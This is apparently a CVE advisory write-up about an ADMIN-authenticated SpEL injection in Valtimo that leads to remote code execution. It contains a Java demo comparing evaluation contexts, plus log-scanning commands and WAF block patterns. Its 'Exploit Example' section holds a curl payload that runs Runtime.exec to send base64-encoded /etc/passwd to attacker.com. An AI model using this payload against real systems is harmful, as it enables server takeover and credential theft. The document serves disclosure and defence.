How the Mentioned CVE Works
Multiple classes in Valtimo evaluate Spring Expression Language (SpEL) expressions built from user-supplied input using `StandardEvaluationContext`. Unlike the safer `SimpleEvaluationContext`, `StandardEvaluationContext` provides unrestricted access to all Java types and methods, so an expression can reference and call into arbitrary Java classes such as `java.lang.Runtime`.
A remote attacker who is authenticated with the ADMIN role can exploit this by crafting malicious SpEL expressions and injecting them via two vulnerable mechanisms: the `DocumentMigrationService` and the `Condition` framework.
For `DocumentMigrationService` (affected since version 12.0.0), the exploit is delivered through the document migration REST API by sending a POST request to `/api/management/v1/document-definition/migrate` or `/api/management/v1/document-definition/migration/conflicts`. The attacker places a malicious SpEL expression in the `source` or `target` field of a `DocumentMigrationPatch` object in the request body, using the `${…}` template syntax. The system passes this unvalidated input to the `handleSpelExpression` method, which evaluates it with `StandardEvaluationContext`.
Because `StandardEvaluationContext` lets the expression execute arbitrary code, an attacker could use `T(java.lang.Runtime).getRuntime().exec('…')` to run system commands, `T(java.lang.System).getenv()` to exfiltrate all environment variables (including database passwords and API keys), `T(java.lang.System).getProperties()` to read JVM system properties, or `T(java.lang.Class).forName('…')` to load arbitrary Java classes. This effectively grants the attacker full control over the server.
The `Condition` framework (affected since version 13.4.0) presents an even larger attack surface, as it is used across many modules such as admin-configured widgets and dashboards. In this case, the attacker supplies the malicious SpEL expression in the `value` field of a condition's JSON configuration, which is then processed by the `Condition.resolveValue` method.
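The following is an added example, not Valtimo's own code, that reproduces the two evaluation contexts side by side: the same parser evaluates a benign data-binding expression and a `T(...)` type reference, first under `StandardEvaluationContext` (the vulnerable pattern) and then under `SimpleEvaluationContext.forReadOnlyDataBinding()` (the hardened pattern). It assumes `spring-expression` is on the classpath; `MigrationDoc` is a hypothetical stand-in for the object a patch expression is evaluated against, the `${…}` wrapper is assumed to have been stripped already, and the type reference deliberately reads a harmless JVM property rather than spawning a process.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

/**
 * Added example (not Valtimo code): why evaluating untrusted SpEL with
 * StandardEvaluationContext is dangerous, and how SimpleEvaluationContext
 * confines the same expression to read-only data binding on a root object.
 */
public class SpelContextDemo {

    /** Hypothetical root object a migration patch expression is resolved against. */
    public static class MigrationDoc {
        private final String title;
        public MigrationDoc(String title) { this.title = title; }
        public String getTitle() { return title; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    /** Vulnerable pattern: unrestricted context; T(...) references and any method call are allowed. */
    static Object evaluateUnrestricted(String expr, Object root) {
        EvaluationContext ctx = new StandardEvaluationContext(root);
        return PARSER.parseExpression(expr).getValue(ctx);
    }

    /** Hardened pattern: read-only property access only; no type references, constructors or bean references. */
    static Object evaluateRestricted(String expr, Object root) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(root)
                .build();
        return PARSER.parseExpression(expr).getValue(ctx);
    }

    public static void main(String[] args) {
        MigrationDoc doc = new MigrationDoc("invoice-2024"); // constructed sample root object

        // A legitimate data-binding expression resolves in both contexts.
        String benign = "title";
        System.out.println("standard/benign  -> " + evaluateUnrestricted(benign, doc));
        System.out.println("simple/benign    -> " + evaluateRestricted(benign, doc));

        // A type reference of the kind the advisory describes. A harmless call is used
        // here so the mechanism is visible without executing anything on the host.
        String typeRef = "T(java.lang.System).getProperty('java.version')";
        System.out.println("standard/typeRef -> " + evaluateUnrestricted(typeRef, doc));
        try {
            evaluateRestricted(typeRef, doc);
            System.out.println("simple/typeRef   -> UNEXPECTED: expression was evaluated");
        } catch (EvaluationException e) {
            // SimpleEvaluationContext has no TypeLocator, so T(...) fails with SpelEvaluationException.
            System.out.println("simple/typeRef   -> rejected: " + e.getMessage());
        }
    }
}
```

The design point is that the fix is a different evaluation context, not an input filter: `SimpleEvaluationContext` refuses `T(...)` at evaluation time regardless of how the expression is spelled, whereas a WAF rule on `T(java.lang` only catches the literal substring.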
DailyCVE Form
Platform: Valtimo
Version: 12.0.0 – 12.31.0 / 13.0.0 – 13.22.0
Vulnerability: ADMIN SpEL RCE
Severity: Critical
Date: 2026-05-06
Prediction: 2026-08-01
What Undercode Say:
Analytics:
- Log all POST requests containing `${…}` in `source` or `target` fields.
- Monitor for the execution of unexpected system processes or netcat reverse shells.
- Detect unusual API calls to internal endpoints by the Valtimo application service account.
Bash Command:
```bash
# Scan access logs for requests to the vulnerable migration endpoints whose logged
# body contains a SpEL type reference. The second grep uses -F: with -E the parentheses
# in "T(java.lang.Runtime)" would be a regex group and the pattern would never match.
grep -E 'POST /api/management/v1/document-definition/(migrate|migration/conflicts)' /var/log/valtimo/access.log \
  | grep -F 'T(java.lang.Runtime)'

# Check for established outbound TCP connections initiated by the Valtimo Java process
# (pgrep -d, joins multiple matching PIDs into the comma-separated list lsof -p expects).
lsof -p "$(pgrep -d, -f valtimo)" | grep TCP | grep ESTABLISHED
```
Exploit Example:
```bash
curl -X POST https://victim.com/api/management/v1/document-definition/migrate \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"source":"${T(java.lang.Runtime).getRuntime().exec(\"curl attacker.com:8000?$(cat /etc/passwd | base64 -w0)\")}","target":""}'
```
Protection:
Apply the patched releases 12.32.0 or 13.23.0 immediately. If patching is delayed, consider removing the `ADMIN` role from untrusted users, restricting network access to the vulnerable REST API endpoints, or deploying a Web Application Firewall rule that blocks requests containing `T(java.lang` or `${T(`.
Impact:
An attacker with ADMIN credentials can completely compromise a Valtimo server, exfiltrating environment variables containing secrets such as database passwords and API keys. The attacker may also pivot deeper into the internal network or gain persistent access to the system through a reverse shell.
Sources:
Reported By: github.com